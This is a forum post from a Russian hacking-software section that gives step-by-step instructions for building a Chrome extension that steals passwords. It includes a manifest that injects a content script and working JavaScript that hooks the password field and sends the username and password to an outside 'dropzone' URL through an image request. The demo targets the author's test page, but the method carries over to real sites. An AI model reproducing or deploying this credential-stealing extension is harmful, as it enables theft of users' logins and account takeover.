1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Как писать плагины для хрома

Тема в разделе "Софт для взлома", создана пользователем eliuha, 14 дек 2015.

  1. eliuha
    eliuha Новичок
    Симпатии:
    0
    Уже писал это на работе, но думаю что Форуму будет интересно.
    если что, переведу на Русский


    https://devcentral.f5.com/articles/diy-programmable-man-in-the-middle-for-security-testing-part-ii

    1. Create a folder on your hard drive
    2. Inside that folder, create a file named manifest.json
    3. Put the next code inside:
      {"manifest_version":2,

      "name":"F5 Script Injector","description":"Injects a JavaScript to the page. Created by Ilya Chernyakov ","version":"2.0",

      "browser_action":{"default_icon":"Injection-icon.png"},"permissions":["http://eliuha.com/extDemo/*"],"content_scripts":[{"matches":["http://eliuha.com/extDemo/*"],"js":["malicious_script.js"]}]}
    4. Create an image, for an icon, name it Injection-icon.png and save it to the same directory
    That’s it: you have a chrome extension. Let’s see if it works.



    Loading extension to Chrome
    1. Type chrome://extensions in the address bar
    2. Ensure that the Developer mode checkbox in the top right-hand corner is checked.
      [​IMG]
    3. Click Load unpacked extension… to pop up a file-selection dialog.
    4. Navigate to the directory in which your extension files live, and select it.
    Alternatively, you can drag and drop the directory where your extension files live onto chrome://extensions in your browser to load it.
    If the extension is valid, it will be load and be immediately active. If it's invalid, an error message will be displayed at the top of the page. Correct the error, and try again.
    Now you should see your icon, which is a filename you wrote in the default_icon directive in the manifest file on your browser’s bar. This means that we have our code running in the browser’s context.

    [​IMG]



    Stealing the password
    Our reason to create a Chrome extension was to steal our victim’s password. When the password was typed in the password field, it is stored in the DOM and we can use Javascript to access it and send it to our “dropzone” location. In order to achieve that, we will have to inject a Javascript code into a webpage, and our extension will help us in do that. Lets go to our manifest.json file and add the following lines:

    "content_scripts":[{"matches":["http://eliuha.com/extDemo/*"],"js":["malisious_script.js"]}]
    The code basically tells Chrome that if the URL matches the expression in the quotes, the Javascript should be injected.
    Note that manifest.json is a JSON data structure , and therefore, the format should look like this:

    {key”:”value”,”key”:”value”}

    where each value, except the last one is followed by a comma (,).



    After changing the manifest, we should create a Javascript malicious code that we want to run.



    Malicious Script
    We will find all the text fields and send their text to some other website. We will assume that the username field and the password field are named “username” and “password” respectively. Let’s view the HTML onhttp://eliuha.com/extDemo/bank.html

    [​IMG]


    <inputautocomplete="off"class="form-login"id="Username"name="username"size="30"value=""><inputautocomplete="off"class="form-password"id="Password"name="password"size="30"value="">
    Note that the password field was intentionally created as an unprotected field omitting the type=”password” to make our hacking easier.



    Lets write a simple script to get the values of the fields

    //this part does all the password stealing and sends it to attackers website

    function grabCredentials(){var user = document.getElementsByName('username')[0].value;varpass= document.getElementsByName('password')[0].value;

    var theUrl ='http://www.eliuha.com/hack/creds.jpg?user='+user+'&pass='+pass+'';

    var img = document.createElement('img');
    img.src = theUrl;}

    // event listener proxyfunction hook(){
    console.log("GrabCreds");
    grabCredentials();

    }

    //hooking when password field looses focus
    document.getElementsByName("password")[0].onblur=hook;


    The extension should be working
     
    14 дек 2015

Поделиться этой страницей

Загрузка...